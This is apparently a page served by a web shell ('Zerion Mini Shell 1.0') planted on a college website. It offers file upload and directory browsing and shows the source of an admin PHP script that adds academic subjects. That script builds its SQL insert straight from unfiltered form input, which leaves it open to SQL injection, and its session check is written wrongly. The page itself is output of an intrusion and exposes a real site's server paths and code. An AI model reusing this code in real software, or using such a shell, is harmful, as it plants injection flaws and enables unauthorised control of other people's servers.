ok

Mini Shell

Direktori : /home/ngwcolle/public_html/admin/
Upload File :
Current File : /home/ngwcolle/public_html/admin/add-subject.php

<?php session_start();
//DB conncetion
include_once('includes/config.php');
//validating Session
if (strlen($_SESSION['aid']==0)) {
  header('location:logout.php');
  } else{


    if(isset($_POST['submit']))
  {
    $tname=strtoupper($_POST['teamname']);
  $stream=$_POST['stream'];
  $cdate=$_POST['cdate'];
  $description=$_POST['editor'];
  $hod=$_POST['hod'];
  $capacity=$_POST['capacity'];
  $sanctionedpost=$_POST['spost'];
  $mip=$_POST['mip'];
  $vacancy=$_POST['vacancy'];
$query=mysqli_query($con, "insert into tbl_subject(subname,strem,cdate,hodname,about,capacity,sanctionedpost,mip,vacancy) values('$tname','$stream','$cdate','$hod','$description','$capacity','$sanctionedpost','$mip','$vacancy')");
if ($query) {
echo '<script>alert("Subject Created.")</script>';
echo "<script>window.location.href ='manage-subject.php'</script>";
  }else{
echo '<script>alert("Something Went Wrong. Please try again.")</script>';
    }
  }
?>

<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">

    <title> Subject Creation</title>

    <!-- Custom fonts for this template-->
    <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
    <link
        href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
        rel="stylesheet">

    <!-- Custom styles for this template-->
    <link href="css/sb-admin-2.min.css" rel="stylesheet">
    <script src="vendor/ckeditor/ckeditor.js"></script>
<style type="text/css">
label{
    font-size:16px;
    font-weight:bold;
    color:#000;
}

</style>

</head>

<body id="page-top">

    <!-- Page Wrapper -->
    <div id="wrapper">

<?php include_once('includes/sidebar.php');?>

        <!-- Content Wrapper -->
        <div id="content-wrapper" class="d-flex flex-column">

            <!-- Main Content -->
            <div id="content">

                <!-- Topbar -->
          <?php include_once('includes/topbar.php');?>
                <!-- End of Topbar -->

                <!-- Begin Page Content -->
                <div class="container-fluid">

                    <!-- Page Heading -->
                    <h1 class="h3 mb-4 text-gray-800">Subject/StreamCreation</h1>
     <form method="post"  name="adminprofile" >



  <div class="row">

                        <div class="col-lg-9">

                            <!-- Basic Card Example -->
                            <div class="card shadow mb-4">


                                <div class="card-body">
     <div class="form-group row">
     <div class="col-sm-6">
                            <label>Subject Name</label>
           <input type="text" class="form-control" name="teamname" value="" required='true'>
</div>
                                        
                                       <div class="col-sm-6">
                            <label>Stream Name</label>
           <select name="stream" id="" class="form-control" required>
            <option value="">--Select--</option>
            <option value="ARTS">ARTS</option>
            <option value="SCIENCE">SCIENCE</option>
            <option value="COMMERCE">COMMERCE</option>
            <option value="SELF FINANCING">SELF FINANCING</option>
           </select>
                                        </div>
</div>
                                        <div class="form-group row">
                                        <div class="col-sm-6">
                            <label>Name of the HOD</label>
           <input type="text" class="form-control" name="hod" required>
                                        </div>

                        
                                        


                                        <div class="col-sm-6">
<label>Date of Creation</label>
<input type="date" class="form-control" name="cdate" value="" required='true'>
</div></div>
<div class="form-group row">
                                        <div class="col-sm-6">
                            <label>Student Strength</label>
           <input type="number" class="form-control" name="capacity" required>
                                        </div>

                        
                                        


                                        <div class="col-sm-6">
<label>No. of Sanctioned Post</label>
<input type="number" class="form-control" name="spost" value="" required='true'>
</div></div>
<div class="form-group row">
                                        <div class="col-sm-6">
                            <label>Men In Position</label>
           <input type="text" class="form-control" name="mip" required>
                                        </div>

                        
                                        


                                        <div class="col-sm-6">
<label>Post Vacancy</label>
<input type="number" class="form-control" name="vacancy" value="" required='true'>
</div></div>
<div class="form-group ">
                   
                        <label for="inputCity">Description About the Department</label>
                        <textarea name="editor" id="editor" cols="30" rows="7" class="form-control" required placeholder="History/Mission/Vision etc..."></textarea>
                        <!-- <input type="date" class="form-control" id="inputCity" name="cdate" placeholder="City"> -->
                  
                   
                    
                </div>

                        

        <div class="form-group">
                                 <input type="submit" class="btn btn-primary btn-user btn-block" name="submit" id="submit" value="Create">                           
                             </div>                                        

                                </div>
                            </div>

                        </div>

               

                    </div>
</form>

                </div>
                <!-- /.container-fluid -->

            </div>
            <!-- End of Main Content -->

           <?php include_once('includes/footer.php');?>

        </div>
        <!-- End of Content Wrapper -->

    </div>
    <!-- End of Page Wrapper -->

    <!-- Scroll to Top Button-->

           <?php include_once('includes/footer2.php');?>


    <!-- Bootstrap core JavaScript-->
    <script src="vendor/jquery/jquery.min.js"></script>
    <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

    <!-- Core plugin JavaScript-->
    <script src="vendor/jquery-easing/jquery.easing.min.js"></script>

    <!-- Custom scripts for all pages-->
    <script src="js/sb-admin-2.min.js"></script>
    <script>
CKEDITOR.replace('editor');
</script>
</body>
</html>
<?php } ?>

Zerion Mini Shell 1.0